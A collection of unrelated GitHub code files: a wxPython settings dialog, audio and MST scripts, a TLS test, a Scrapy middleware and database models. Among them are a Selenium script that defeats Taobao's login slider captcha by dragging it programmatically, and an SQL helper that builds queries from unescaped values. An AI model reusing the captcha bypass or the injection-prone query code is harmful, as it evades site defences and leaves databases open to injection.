wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxNumChannelsLabel = wx.StaticText(self, wx.ID_ANY, \"DMX channels:\") #@UndefinedVariable\n self._dmxNumChannelsField = wx.SpinCtrl(self, value=str(numChannels), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._dmxNumChannelsField.SetRange(0, 16)\n 
dmxNumChannelsSizer.Add(dmxNumChannelsLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxNumChannelsSizer.Add(self._dmxNumChannelsField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxNumChannelsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n dmxBinaryNameSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n dmxBinaryNameLabel = wx.StaticText(self, wx.ID_ANY, \"DMX binary:\") #@UndefinedVariable\n self._dmxBinaryNameField = wx.TextCtrl(self, wx.ID_ANY, str(dmxBinaryName), size=(120, -1)) #@UndefinedVariable\n dmxBinaryNameSizer.Add(dmxBinaryNameLabel, 1, wx.ALL, 5) #@UndefinedVariable\n dmxBinaryNameSizer.Add(self._dmxBinaryNameField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(dmxBinaryNameSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Window:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n fullscreenMode = self._configurationClass.getFullscreenMode()\n fullscreenSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n fullscreenLabel = wx.StaticText(self, wx.ID_ANY, \"Fullscreen:\") #@UndefinedVariable\n self._fullscreenField = wx.ComboBox(self, wx.ID_ANY, size=(200, -1), choices=[\"off\", \"on\", \"auto\"], style=wx.CB_READONLY) #@UndefinedVariable\n self._fullscreenField.SetStringSelection(fullscreenMode)\n fullscreenSizer.Add(fullscreenLabel, 1, wx.ALL, 5) #@UndefinedVariable\n fullscreenSizer.Add(self._fullscreenField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(fullscreenSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n resolutionX, resolutionY = self._configurationClass.getResolution()\n resolutionXSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n resolutionXLabel = wx.StaticText(self, wx.ID_ANY, \"X resolution:\") #@UndefinedVariable\n self._resolutionXField = wx.SpinCtrl(self, value=str(resolutionX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._resolutionXField.SetRange(400, 4000)\n resolutionXSizer.Add(resolutionXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n resolutionXSizer.Add(self._resolutionXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(resolutionXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n resolutionYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n resolutionYLabel = wx.StaticText(self, wx.ID_ANY, \"Y resolution:\") #@UndefinedVariable\n self._resolutionYField = wx.SpinCtrl(self, value=str(resolutionY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._resolutionYField.SetRange(300, 3000)\n resolutionYSizer.Add(resolutionYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n resolutionYSizer.Add(self._resolutionYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(resolutionYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n autoPosition = self._configurationClass.isAutoPositionEnabled()\n autopositionSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n autopositionLabel = wx.StaticText(self, wx.ID_ANY, \"Autoposition:\") #@UndefinedVariable\n self._autopositionField = wx.CheckBox(self, wx.ID_ANY, \"Let OS position window.\") #@UndefinedVariable\n self._autopositionField.SetValue(autoPosition)\n autopositionSizer.Add(autopositionLabel, 1, wx.ALL, 5) #@UndefinedVariable\n autopositionSizer.Add(self._autopositionField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(autopositionSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n positionX, positionY = self._configurationClass.getPosition()\n positionXSizer 
= wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n positionXLabel = wx.StaticText(self, wx.ID_ANY, \"X position:\") #@UndefinedVariable\n self._positionXField = wx.SpinCtrl(self, value=str(positionX), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._positionXField.SetRange(-1, 8000)\n positionXSizer.Add(positionXLabel, 1, wx.ALL, 5) #@UndefinedVariable\n positionXSizer.Add(self._positionXField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(positionXSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n positionYSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n positionYLabel = wx.StaticText(self, wx.ID_ANY, \"Y position:\") #@UndefinedVariable\n self._positionYField = wx.SpinCtrl(self, value=str(positionY), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._positionYField.SetRange(-1, 6000)\n positionYSizer.Add(positionYLabel, 1, wx.ALL, 5) #@UndefinedVariable\n positionYSizer.Add(self._positionYField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(positionYSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n avoidScreensaver = self._configurationClass.isAvoidScreensaverEnabled()\n avoidScreensaverSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n avoidScreensaverLabel = wx.StaticText(self, wx.ID_ANY, \"Screensaver:\") #@UndefinedVariable\n self._avoidScreensaverField = wx.CheckBox(self, wx.ID_ANY, \"Try to avoid screensaver.\") #@UndefinedVariable\n self._avoidScreensaverField.SetValue(avoidScreensaver)\n avoidScreensaverSizer.Add(avoidScreensaverLabel, 1, wx.ALL, 5) #@UndefinedVariable\n avoidScreensaverSizer.Add(self._avoidScreensaverField, 2, wx.ALL, 5) #@UndefinedVariable\n if(sys.platform != \"darwin\"):\n dialogSizer.Add(avoidScreensaverSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n infoText = wx.StaticText(self, wx.ID_ANY, \"Startup:\") #@UndefinedVariable\n infoText.SetFont(boldFont)\n dialogSizer.Add(infoText, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startConfig = self._configurationClass.getStartConfig()\n startConfigSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n startConfigLabel = wx.StaticText(self, wx.ID_ANY, \"Start configuration:\") #@UndefinedVariable\n self._startConfigField = wx.TextCtrl(self, wx.ID_ANY, str(startConfig), size=(120, -1)) #@UndefinedVariable\n startConfigSizer.Add(startConfigLabel, 1, wx.ALL, 5) #@UndefinedVariable\n startConfigSizer.Add(self._startConfigField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(startConfigSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n startNote = self._configurationClass.getStartNoteNumber()\n startNoteSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n startNoteLabel = wx.StaticText(self, wx.ID_ANY, \"Start note:\") #@UndefinedVariable\n self._startNoteField = wx.SpinCtrl(self, value=str(startNote), pos=(-1, -1), size=(60, -1)) #@UndefinedVariable\n self._startNoteField.SetRange(-1, 127)\n startNoteSizer.Add(startNoteLabel, 1, wx.ALL, 5) #@UndefinedVariable\n startNoteSizer.Add(self._startNoteField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(startNoteSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n videoDir = self._configurationClass.getVideoDir()\n videoDirSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n videoDirLabel = wx.StaticText(self, wx.ID_ANY, \"Video directory:\") #@UndefinedVariable\n self._videoDirField = wx.TextCtrl(self, wx.ID_ANY, str(videoDir), size=(120, -1)) #@UndefinedVariable\n videoDirSizer.Add(videoDirLabel, 1, wx.ALL, 5) #@UndefinedVariable\n 
videoDirSizer.Add(self._videoDirField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(videoDirSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n configDir = self._configurationClass.getConfigDir()\n configDirSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n configDirLabel = wx.StaticText(self, wx.ID_ANY, \"Configuration directory:\") #@UndefinedVariable\n self._configDirField = wx.TextCtrl(self, wx.ID_ANY, str(configDir), size=(120, -1)) #@UndefinedVariable\n configDirSizer.Add(configDirLabel, 1, wx.ALL, 5) #@UndefinedVariable\n configDirSizer.Add(self._configDirField, 2, wx.ALL, 5) #@UndefinedVariable\n dialogSizer.Add(configDirSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n\n buttonsSizer = wx.BoxSizer(wx.HORIZONTAL) #@UndefinedVariable\n newButton = wx.Button(self, wx.ID_ANY, 'Save', size=(60,-1)) #@UndefinedVariable\n newButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n cancelButton = wx.Button(self, wx.ID_ANY, 'Cancel', size=(60,-1)) #@UndefinedVariable\n cancelButton.SetBackgroundColour(wx.Colour(210,210,210)) #@UndefinedVariable\n buttonsSizer.Add(newButton, 1, wx.ALL, 5) #@UndefinedVariable\n buttonsSizer.Add(cancelButton, 1, wx.ALL, 5) #@UndefinedVariable\n newButton.Bind(wx.EVT_BUTTON, self._onOk) #@UndefinedVariable\n cancelButton.Bind(wx.EVT_BUTTON, self._onCancel) #@UndefinedVariable\n dialogSizer.Add(buttonsSizer, proportion=1, flag=wx.EXPAND) #@UndefinedVariable\n\n self.SetSizer(dialogSizer)\n\n\n def _onOk(self, event):\n startConfig = self._startConfigField.GetValue()\n startNote = noteToNoteString(self._startNoteField.GetValue())\n videoDir = self._videoDirField.GetValue()\n configDir = self._configDirField.GetValue()\n self._configurationClass.setStartupConfig(startConfig, startNote, videoDir, configDir)\n\n resX = self._resolutionXField.GetValue()\n resY = self._resolutionYField.GetValue()\n fullscreenMode = self._fullscreenField.GetValue()\n isAutoPos = self._autopositionField.GetValue()\n posX = self._positionXField.GetValue()\n posY = self._positionYField.GetValue()\n isAvoidScreensaver = self._avoidScreensaverField.GetValue()\n self._configurationClass.setScreenConfig(resX, resY, fullscreenMode, isAutoPos, posX, posY, isAvoidScreensaver)\n\n\n midiBcast = self._playerMidiBcastOnField.GetValue()\n midiAddress = self._playerBindNameField.GetValue()\n midiPort = self._playerMidiPortField.GetValue()\n webAddress = self._playerWebBindNameField.GetValue()\n webPort = self._playerWebPortField.GetValue()\n dmxUniverse = self._dmxUniverseField.GetValue()\n dmxChannelStart = self._dmxStartIdField.GetValue()\n dmxChannelWidth = self._dmxChannelWidthField.GetValue()\n dmxNumChannels = self._dmxNumChannelsField.GetValue()\n dmxBinaryName = self._dmxBinaryNameField.GetValue()\n self._configurationClass.setServerConfig(midiBcast, midiAddress, midiPort, webAddress, webPort,\n dmxUniverse, dmxChannelStart, dmxChannelWidth, dmxNumChannels, dmxBinaryName)\n xmlString = self._configurationClass.getXmlString()\n self._sendConfigCallback(xmlString)\n wx.MessageBox('You must restart Player to make sure all changes to take effect!', 'Info', wx.OK | wx.ICON_INFORMATION) #@UndefinedVariable\n self.Destroy()\n\n def _onCancel(self, event):\n self.Destroy()\n","repo_name":"perchrn/TaktPlayer","sub_path":"gui/configurationGui/FileMenu.py","file_name":"FileMenu.py","file_ext":"py","file_size_in_byte":37427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"73715209807","text":"# 
-*- coding: utf-8 -*-\nimport numpy as np\nimport pylab\nfrom scipy.io.wavfile import write\nimport os\n# http://picosanta.tistory.com/13\n\n# sampling rate\nFs = 44100.0 # Hz\n\n# play length\ntlen = float(raw_input('Input Play Time(s): ')) # sound duration\nTs = 1/Fs # sampling interval\nt = np.arange(0, tlen, Ts) # time array\n\n# generate signal\nsin_freq = float(raw_input('Input Frequency : ')) # frequency\nsignal = np.sin(2*np.pi*sin_freq*t)\n\n# generate noise\nnoise = 0 # np.random.uniform(-1, 1, len(t))*0.1\n\n# signal + noise\nsignal_n = signal + noise\n \n# fft\nsignal_f = np.fft.fft(signal_n)\nfreq = np.fft.fftfreq(len(t), Ts)\n\n# plot\npylab.plot(freq, 20*np.log10(np.abs(signal_f)))\npylab.xlim(0, Fs/2)\npylab.show()\n\n# save as wav file\nscaled = np.int16(signal_n/np.max(np.abs(signal_n)) * 32767)\nwrite('test.wav', Fs, scaled)\n\n# play wav file\nos.system(\"test.wav\")\n","repo_name":"khw5123/Project","sub_path":"Python/FrequencyToWav.py","file_name":"FrequencyToWav.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"1270386452","text":"# -*- coding: utf-8 -*-\n# !usr/bin/env python\nfrom selenium import webdriver\nimport requests\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\n\nchorme_header = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2652.2 Safari/537.36'}\n\ntry:\n    web_browser = webdriver.Chrome(executable_path=(r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe'))\nexcept Exception as e:\n    print(e)\nweburl = 'https://login.taobao.com/member/login.jhtml?spm=a21bo.2017.754894437.1.760011d92ECDfo&f=top&redirectURL=https%3A%2F%2Fwww.taobao.com%2F%3Fspm%3Da2107.1.0.0.638411d968vtCC'\n# no need to fetch the http status, it just wastes time\n#httpcode = requests.get(weburl, headers = chorme_header).status_code\nweb_browser.maximize_window()\nweb_browser.get(weburl)\ntry:\n    web_browser.find_element_by_id('fm-login-id').click()\n    web_browser.find_element_by_id('fm-login-id').send_keys('loginid')\n    web_browser.find_element_by_id('fm-login-password').send_keys('password')\n    # perform the click action first,\n    web_browser.find_element_by_xpath(\"//button[@tabindex='3']\").click()\n    #(\"//input[@type='submit' and @value='something']\").click()\n    #web_browser.find_element_by_xpath(\"//[@type='submit']\").click()\n    #nc_1__scale_text\n    #web_browser.find_element_by_id('nc_1__scale_text')\n    WebDriverWait(web_browser, 5)\n    ActionChains(web_browser).drag_and_drop_by_offset(web_browser.find_element_by_xpath(\"//*[@id='nc_1_n1z']\"), 280, 0).perform()\n    # wait for the js to load\n    WebDriverWait(web_browser, 5)\n    # click the login button (pressing Enter would also work)\n    web_browser.find_element_by_xpath(\"//button[@tabindex='3']\").click()\n    time.sleep(5)\n    web_browser.get_screenshot_as_file('d:\\\\python_file\\\\%s.png' % (time.strftime('%Y-%m-%d-%H-%M-%S')))\n    print('Screenshot captured successfully!')\nexcept Exception as E:\n    print(E)\n    web_browser.close()\n","repo_name":"ron-dicaprio/pydev","sub_path":"selenium_login.py","file_name":"selenium_login.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"38346901168","text":"import functools\nimport socket\nimport ssl\n\nimport pytest\n\nfrom elastic_transport import (\n    AiohttpHttpNode,\n    NodeConfig,\n    RequestsHttpNode,\n    TlsError,\n    Urllib3HttpNode,\n)\nfrom 
elastic_transport._compat import await_if_coro\nfrom elastic_transport.client_utils import url_to_node_config\n\nTLSv1_0_URL = \"https://tls-v1-0.badssl.com:1010\"\nTLSv1_1_URL = \"https://tls-v1-1.badssl.com:1011\"\nTLSv1_2_URL = \"https://tls-v1-2.badssl.com:1012\"\n\npytestmark = pytest.mark.asyncio\nnode_classes = pytest.mark.parametrize(\n \"node_class\", [AiohttpHttpNode, Urllib3HttpNode, RequestsHttpNode]\n)\n\nsupported_version_params = [\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1),\n (TLSv1_1_URL, ssl.PROTOCOL_TLSv1_1),\n (TLSv1_2_URL, ssl.PROTOCOL_TLSv1_2),\n (TLSv1_2_URL, None),\n]\nunsupported_version_params = [\n (TLSv1_0_URL, None),\n (TLSv1_1_URL, None),\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1_1),\n (TLSv1_0_URL, ssl.PROTOCOL_TLSv1_2),\n (TLSv1_1_URL, ssl.PROTOCOL_TLSv1_2),\n]\n\ntry:\n from ssl import TLSVersion\nexcept ImportError:\n pass\nelse:\n supported_version_params.extend(\n [\n (TLSv1_0_URL, TLSVersion.TLSv1),\n (TLSv1_1_URL, TLSVersion.TLSv1_1),\n (TLSv1_2_URL, TLSVersion.TLSv1_2),\n ]\n )\n unsupported_version_params.extend(\n [\n (TLSv1_0_URL, TLSVersion.TLSv1_1),\n (TLSv1_0_URL, TLSVersion.TLSv1_2),\n (TLSv1_1_URL, TLSVersion.TLSv1_2),\n (TLSv1_0_URL, TLSVersion.TLSv1_3),\n (TLSv1_1_URL, TLSVersion.TLSv1_3),\n (TLSv1_2_URL, TLSVersion.TLSv1_3),\n ]\n )\n\n\n@functools.lru_cache()\ndef tlsv1_1_supported() -> bool:\n # OpenSSL distributions on Ubuntu/Debian disable TLSv1.1 and before incorrectly.\n # So we try to detect that and skip tests when needed.\n try:\n sock = socket.create_connection((\"tls-v1-1.badssl.com\", 1011))\n ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)\n sock = ctx.wrap_socket(sock, server_hostname=\"tls-v1-1.badssl.com\")\n sock.close()\n except ssl.SSLError:\n return False\n return True\n\n\n@node_classes\n@pytest.mark.parametrize(\n [\"url\", \"ssl_version\"],\n supported_version_params,\n)\nasync def test_supported_tls_versions(node_class, url: str, ssl_version: int):\n if url in (TLSv1_0_URL, TLSv1_1_URL) and not tlsv1_1_supported():\n pytest.skip(\"TLSv1.1 isn't supported by this OpenSSL distribution\")\n node_config = url_to_node_config(url).replace(ssl_version=ssl_version)\n node = node_class(node_config)\n\n resp, _ = await await_if_coro(node.perform_request(\"GET\", \"/\"))\n assert resp.status == 200\n\n\n@node_classes\n@pytest.mark.parametrize(\n [\"url\", \"ssl_version\"],\n unsupported_version_params,\n)\nasync def test_unsupported_tls_versions(node_class, url: str, ssl_version: int):\n node_config = url_to_node_config(url).replace(ssl_version=ssl_version)\n node = node_class(node_config)\n\n with pytest.raises(TlsError) as e:\n await await_if_coro(node.perform_request(\"GET\", \"/\"))\n assert \"unsupported protocol\" in str(e.value) or \"handshake failure\" in str(e.value)\n\n\n@node_classes\n@pytest.mark.parametrize(\"ssl_version\", [0, \"TLSv1\", object()])\ndef test_ssl_version_value_error(node_class, ssl_version):\n with pytest.raises(ValueError) as e:\n node_class(NodeConfig(\"https\", \"localhost\", 9200, ssl_version=ssl_version))\n assert str(e.value) == (\n f\"Unsupported value for 'ssl_version': {ssl_version!r}. 
Must be either \"\n        \"'ssl.PROTOCOL_TLSvX' or 'ssl.TLSVersion.TLSvX'\"\n    )\n","repo_name":"elastic/elastic-transport-python","sub_path":"tests/node/test_tls_versions.py","file_name":"test_tls_versions.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"65"} +{"seq_id":"5670672239","text":"def update_query(query_dict: dict) -> str:\n    values = ''\n    for key, value in query_dict.items():\n        values += f'{key}=\\'{value}\\', '\n    index = values.rfind(',')\n    return values[:index] + ' '\n\n\ndef insert_query(query_dict: dict) -> tuple[tuple, tuple]:\n    columns = []\n    values = []\n    for key, value in query_dict.items():\n        columns.append(key)\n        values.append(value)\n    return tuple(columns), tuple(values)\n\n","repo_name":"kirode/sql_tests","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17918083677","text":"# https://codeforces.com/group/hPNKVTNJU1/contest/329955/problem/M\n\nn=int(input())\ns=list(map(int,input().split()))\ns.sort()\nc=0\nk=1\nfor i in range(n):\n    if s[i]>=k:\n        c+=1\n        k+=1\nprint(c)\n    \n    ","repo_name":"tomsjoseph2410/CP-Hub-Codeforces-Week-1","sub_path":"M. Polycarp Training.py","file_name":"M. Polycarp Training.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72822768526","text":"from selenium.webdriver.support.ui import WebDriverWait\n\nfrom scrapy.http import HtmlResponse\n\nfrom scrapy_selenium import SeleniumRequest, SeleniumMiddleware\n\nimport time\n\n\nclass YouTubeMiddleware(SeleniumMiddleware):\n    \"\"\"\n    Inherit from the scrapy_selenium.SeleniumMiddleware class to handle\n    requests using the Selenium driver for the YouTube page.\n    \"\"\"\n\n    def process_request(self, request, spider):\n        \"\"\"Process a request using the selenium driver if applicable\"\"\"\n\n        if not isinstance(request, SeleniumRequest):\n            return None\n\n        self.driver.get(request.url)\n\n        for cookie_name, cookie_value in request.cookies.items():\n            self.driver.add_cookie(\n                {\n                    'name': cookie_name,\n                    'value': cookie_value\n                }\n            )\n\n        if request.wait_until:\n            WebDriverWait(self.driver, request.wait_time).until(\n                request.wait_until\n            )\n\n        scroll_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n        while True:\n            # Scroll down to bottom\n            self.driver.execute_script(\"window.scrollTo(0, document.documentElement.scrollHeight);\")\n            time.sleep(3.0)\n            # Calculate new scroll height and compare with last scroll height\n            new_scroll_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n            if new_scroll_height == scroll_height:\n                break\n            scroll_height = new_scroll_height\n\n        if request.screenshot:\n            request.meta['screenshot'] = self.driver.get_screenshot_as_png()\n\n        if request.script:\n            self.driver.execute_script(request.script)\n\n        body = str.encode(self.driver.page_source)\n\n        # Expose the driver via the \"meta\" attribute\n        request.meta.update({'driver': self.driver})\n\n        return HtmlResponse(\n            self.driver.current_url,\n            body=body,\n            encoding='utf-8',\n            request=request\n        
)\n","repo_name":"datnnt1997/raker","sub_path":"raker/middlewares/youtube_middlewares.py","file_name":"youtube_middlewares.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73813674128","text":"import operator\nfrom os import access\nimport sys\nsys.path.append(\"/Users/Xiaoguang/Study/CS/Interviews/2021-Google\")\n\nfrom operator import itemgetter\nfrom data_structure.src.disjoint_set import DisjointSet\nimport unittest\nimport heapq\n\ndef kruskal(graph):\n \"\"\"\n graph: List[List[Tuple[int, int]]] aka [ [(node_id, weight), ...], ... ]\n return: mst: List[Tuple[int, int, int]], mst_len: int\n \"\"\"\n if graph == None or len(graph) == 0:\n raise ValueError\n\n mst = []\n mst_len = 0\n \n nodes = range(len(graph))\n ds = DisjointSet()\n for node in nodes:\n ds.make_set(node)\n num_set = len(nodes)\n edges = sorted(_get_edges(graph), key=itemgetter(2)) # ElogE\n \n for from_node, to_node, weight in edges: # E\n if ds.find(from_node) != ds.find(to_node): # logV\n ds.union(from_node, to_node)\n num_set -= 1\n mst.append([from_node, to_node, weight])\n mst_len += weight\n \n if num_set != 1:\n raise Exception(\"Graph is disconnected\")\n \n return mst, mst_len\n\ndef _get_edges(graph):\n edges = []\n for from_node in range(len(graph)):\n for to_node, weight in graph[from_node]:\n edges.append((from_node, to_node, weight))\n return edges \n\ndef prim(graph):\n \"\"\"\n graph: List[List[Tuple[int, int]]] aka [ [(node_id, weight), ...], ... ]\n return: mst: List[Tuple[int, int, int]], mst_len: int\n \"\"\"\n if graph == None or len(graph) == 0:\n raise ValueError\n\n mst = []\n mst_len = 0\n \n start = 0\n frontier = [(0, start, None)]\n done = set()\n \n while frontier and len(done) != len(graph): # O(V)\n node_weight, node, node_parent = heapq.heappop(frontier) # O(logE)\n if node in done:\n continue\n mst.append((node_parent, node, node_weight))\n mst_len += node_weight\n done.add(node)\n for neighbor, weight in graph[node]:\n if neighbor not in done:\n heapq.heappush(frontier, (weight, neighbor, node)) # O(logE)\n \n if len(done) != len(graph):\n raise Exception(\"Graph is disconnected\")\n \n return mst[1:], mst_len\n\n# Graphs\n'''\n 0 - 1 - 2 - 3 - 4\n |_______|\n'''\ngraph1 = [\n [(1, 5)],\n [(0, 5), (2, 10), (3, 5)],\n [(1, 10), (3, 5)],\n [(1, 5), (2, 5), (4, 5)],\n [(3, 5)]\n]\n\nclass Test(unittest.TestCase):\n def test_kruskal_1(self):\n actual = kruskal(graph1)\n expected = ([(0, 1, 5), (1, 3, 5), (2, 3, 5), (3, 4, 5)], 20)\n self.assertEqual(actual, expected)\n \n def test_prim_1(self):\n actual = prim(graph1)\n expected = ([(0, 1, 5), (1, 3, 5), (3, 2, 5), (3, 4, 5)], 20)\n self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n unittest.main()\n \n","repo_name":"wxgisu/2021-Google-Interview","sub_path":"algorithms/practice/mst.1.py","file_name":"mst.1.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43443501598","text":"#coding=utf-8\r\n\r\nimport requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import Header\r\n\r\nurl=''\r\nheader={'Accept':'text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8','Accept-Encoding':'gzip, deflate','Accept-Language': 'zh-CN','Cache-Control': 'max-age=0','Connection': 'Keep-Alive','Cookie': 
'JSESSIONID=A2D0D1F80BE6BCA4B61D5D8C82B8B241','Host': '222.206.176.104','Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763'}\r\nmail_host = \"[SMTPServer]\"\r\nmail_user = \"[YourEmail]\"\r\nmail_pass = \"[Your Password]\"\r\nsender = '[MailSender]'\r\nreceivers = ['PostMaster@qq.com']\r\ncontent = 'accessible'\r\ntitle = 'notice!'\r\n\r\n\r\ndef validate():\r\n\r\n    response=requests.get(url,headers=header)\r\n\r\n    time.sleep(60)\r\n\r\n    html_doc=response.text\r\n\r\n    soup=BeautifulSoup(html_doc,'lxml')\r\n\r\n    request_url='http://222.206.176.104'+soup.find_all('a')[0]['href']\r\n\r\n    request2url=requests.get(url=request_url,headers=header)\r\n\r\n    time.sleep(120)\r\n\r\n    if request2url.status_code == 200:\r\n        sendEmail()\r\n        exit(0)\r\n    else:\r\n        print('404')\r\n        return 0\r\n\r\n\r\ndef sendEmail(): \r\n    message = MIMEText(content, 'plain', 'utf-8') \r\n    message['From'] = \"{}\".format(sender) \r\n    message['To'] = \",\".join(receivers) \r\n    message['Subject'] = title \r\n    try: \r\n        smtpObj = smtplib.SMTP_SSL(mail_host, 465) \r\n        smtpObj.login(mail_user, mail_pass) \r\n        smtpObj.sendmail(sender, receivers, message.as_string()) \r\n        print(\"mail has been sent successfully.\") \r\n    except smtplib.SMTPException as e: \r\n        print(e)\r\n\r\nif __name__=='__main__':\r\n    while True:\r\n        validate()\r\n","repo_name":"demingry/validation_script","sub_path":"validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"40290493419","text":"# coding=UTF-8\nimport os\nimport configparser\nfrom sqlalchemy import create_engine, Table, Column, Float, Integer, BigInteger, DATE, String, MetaData, ForeignKey , Index\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker , relationship, backref\n\nmConfigParser = configparser.RawConfigParser()\nmConfigParser.read(os.path.abspath('.') + '/config.ini')\ndb_host = mConfigParser.get('DB','host')\ndb_name = mConfigParser.get('DB','name')\ndb_username = mConfigParser.get('DB','username')\ndb_password = mConfigParser.get('DB','password')\ndb_port = mConfigParser.get('DB','port')\n\n\n# DB_CONNECT_STRING = \"sqlite:///:memory:\"\n# engine = create_engine(DB_CONNECT_STRING, echo=True)\n# DB_CONNECT_STRING = \"mysql+pymysql://root:gj4rm4_dylan@127.0.0.1:3306/stocker\"\nDB_CONNECT_STRING = \"mysql+pymysql://\"+db_username+\":\"+db_password+\"@\"+db_host+\":\"+db_port+\"/\"+db_name+\"\"\nengine = create_engine(DB_CONNECT_STRING, max_overflow=5)\n# engine = create_engine(DB_CONNECT_STRING, max_overflow=5, echo=True)\n\nBase = declarative_base()\n\nclass SecuritiesFirm(Base):\n\n    __tablename__ = \"securities_firm\"\n\n    branch_id = Column(\"branch_id\", String(50), primary_key=True)\n    branch_name = Column(\"branch_name\", String(50))\n    bank_id = Column(\"bank_id\", String(50))\n    bank_name = Column(\"bank_name\", String(50))\n\n\ndef securities_firm_log_creator(tablename):\n    class SecuritiesFirmLog(Base):\n\n        __tablename__ = tablename\n        # __table_args__ = (Index('securities_firm_log_index', \"branch_id\", \"stock_code\"), )\n\n        id = Column(\"id\", Integer, primary_key=True, autoincrement=True)\n        bank_id = Column(\"bank_id\", String(50))\n        bank_name = Column(\"bank_name\", String(50))\n        branch_id = Column(\"branch_id\", String(50), index=True)\n        # branch_id = Column(String(50) , ForeignKey(\"securities_firm.branch_id\") )\n        branch_name = Column(\"branch_name\", String(50))\n        stock_name = Column(\"stock\", String(50))\n        stock_code = Column(\"stock_code\", String(50), index=True)\n        